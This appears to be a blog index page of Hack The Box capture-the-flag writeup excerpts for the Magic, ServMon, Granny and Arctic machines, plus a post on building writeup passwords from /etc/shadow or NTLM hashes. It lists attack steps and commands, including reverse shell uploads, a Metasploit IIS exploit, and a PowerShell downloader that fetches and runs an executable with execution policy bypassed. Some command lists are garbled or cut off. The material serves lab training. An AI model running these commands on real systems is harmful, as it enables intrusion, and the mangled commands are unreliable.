Hackthebox Magic writeup

Introduction

It is a medium machine from the Hack The Box platform. It has a simple authentication bypass that is used to upload a malicious file, then a jump to another user, followed by privilege escalation using SUID.

Steps involved

1- Port Scan
2- Visiting website
3- Authentication bypass
4- Encoding PHP inside image
5- Uploading malicious file and bypassing security check
6- Uploading PHP reverse shell
7- Getting full shell
8- Getting db user creds
9- Jumping …

Hackthebox ServMon writeup

Basic Information

Difficulty - Easy
Type - Windows
Points - 20
Maker - dmw0ng
User Blood - sampriti: 08 mins, 06 seconds.
Root Blood - sampriti: 34 mins, 10 seconds.

Steps involved

1- Port Scanning
2- Searching exploit for NVMS-1000
3- Directory Traversal (using Burp, just POC)
4- FTP enumeration
5- Extracting passwords using Directory Traversal
6- SSH login into Nadine (user.txt)
7- Revising FTP and Nmap enumerations
8- Checking service on port 8443
9- Local port forwarding through SSH
10- Searching exploit for NSClient++
11- Exploiting NSClient with CLI
12- Getting Root.txt

Commands involved …

Passwords for the Active Hack the Box machines

New methods

For Linux - cat /etc/shadow

Example:

root:$6$YIFGN9YscCV72BjFtx/tehbc7sQTJp09c5.:18277:0:99999:7:::

So use the highlighted part as the password.
So password = YIFGN9YscCV72BjFtx/

For Windows - use the NTLM hash

Example:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c:::

password = 31d6cfe0d16ae931b73c59d7e0c

Old methods

For Linux

1- cat /etc/shadow
2- Copy the whole hash (root)
root:$6$YIFGN9YscCV72BjFtx/tehbc7sQTJp09c5.:18277:0:99999:7:::
3- Then find its MD5 sum, and that's your password for the writeup

For Windows

1- Find root hash with hashdump.exe …

Hackthebox Granny writeup

Commands used

1-nmap -sC -v exploit/windows/iis/iis_webdav_scstoragepathfromurl
4-set targeturi /_vti_bin
5-set rhosts lhost your_ip
6-set lport 1234
7-run

Steps involved

1- Port Scanning
2- Searching exploit for IIS 6.0
3- Exploiting IIS with Metasploit

Port scan

Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-16 23:06 EDT
NSE: Loaded 119 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 23:06
Completed NSE …

Hack the box Arctic writeup

Steps involved

1- Port scanning
2- Exploiting ColdFusion 8 on port 8500
3- Cracking hash
4- Uploading reverse shell
5- Privilege escalation
6- Getting root.txt

Commands Used

1-nmap -sC -sV -O -p- -v -oV hash --wordlist=/root/Desktop/rockyou.txt
4-echo $webclient = New-Object System.Net.WebClient >>wget.ps1
5-echo $url = "" >>wget.ps1
6-echo $file = "exploit.exe" >>wget.ps1
7-echo $webclient.DownloadFile($url,$file) >>wget.ps1
8-powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

Port Scanning

Nmap 7.70 …